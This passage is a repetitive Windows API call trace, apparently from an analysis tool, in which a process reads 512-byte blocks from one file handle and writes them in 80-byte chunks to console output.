nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] GetFileType (hFile=0x50) returned 0x1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] GetFileType (hFile=0x50) returned 0x1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] GetFileType (hFile=0x50) returned 0x1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] WriteFile (in: hFile=0x50, 
lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] GetFileType (hFile=0x50) returned 0x1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] GetFileType (hFile=0x50) returned 0x1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] GetFileType (hFile=0x50) returned 0x1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.134] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.134] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] GetFileType (hFile=0x50) returned 0x1 [0211.134] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0211.134] GetFileType (hFile=0x50) returned 0x1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] GetFileType (hFile=0x50) returned 0x1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] GetFileType (hFile=0x50) returned 0x1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.134] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.134] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 
[0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.135] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.135] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, 
lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.135] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: 
lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.136] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.136] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.136] GetFileType (hFile=0x50) returned 0x1 [0211.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] GetFileType (hFile=0x50) returned 0x1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] GetFileType (hFile=0x50) returned 0x1 [0211.137] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0211.137] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] GetFileType (hFile=0x50) returned 0x1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] GetFileType (hFile=0x50) returned 0x1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] GetFileType (hFile=0x50) returned 0x1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.137] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.137] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] 
GetFileType (hFile=0x50) returned 0x1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.137] GetFileType (hFile=0x50) returned 0x1 [0211.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] GetFileType (hFile=0x50) returned 0x1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] GetFileType (hFile=0x50) returned 0x1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] GetFileType (hFile=0x50) returned 0x1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] GetFileType (hFile=0x50) returned 0x1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 
[0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] GetFileType (hFile=0x50) returned 0x1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] GetFileType (hFile=0x50) returned 0x1 [0211.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.138] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.138] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.139] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.139] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.139] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] GetFileType (hFile=0x50) returned 0x1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] GetFileType (hFile=0x50) returned 0x1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] GetFileType (hFile=0x50) returned 0x1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] GetFileType (hFile=0x50) returned 0x1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] GetFileType (hFile=0x50) returned 0x1 [0211.139] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.139] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] GetFileType (hFile=0x50) returned 0x1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] GetFileType (hFile=0x50) returned 0x1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] GetFileType (hFile=0x50) returned 0x1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.140] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.140] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] GetFileType (hFile=0x50) returned 0x1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] GetFileType (hFile=0x50) returned 0x1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] GetFileType (hFile=0x50) returned 0x1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] GetFileType (hFile=0x50) returned 0x1 [0211.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.140] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] GetFileType 
(hFile=0x50) returned 0x1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] GetFileType (hFile=0x50) returned 0x1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] GetFileType (hFile=0x50) returned 0x1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] GetFileType (hFile=0x50) returned 0x1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.141] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.141] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.141] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] GetFileType (hFile=0x50) returned 0x1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] GetFileType (hFile=0x50) returned 0x1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] GetFileType (hFile=0x50) returned 0x1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.141] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.141] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] GetFileType (hFile=0x50) returned 0x1 [0211.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.142] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.142] _get_osfhandle (_FileHandle=1) returned 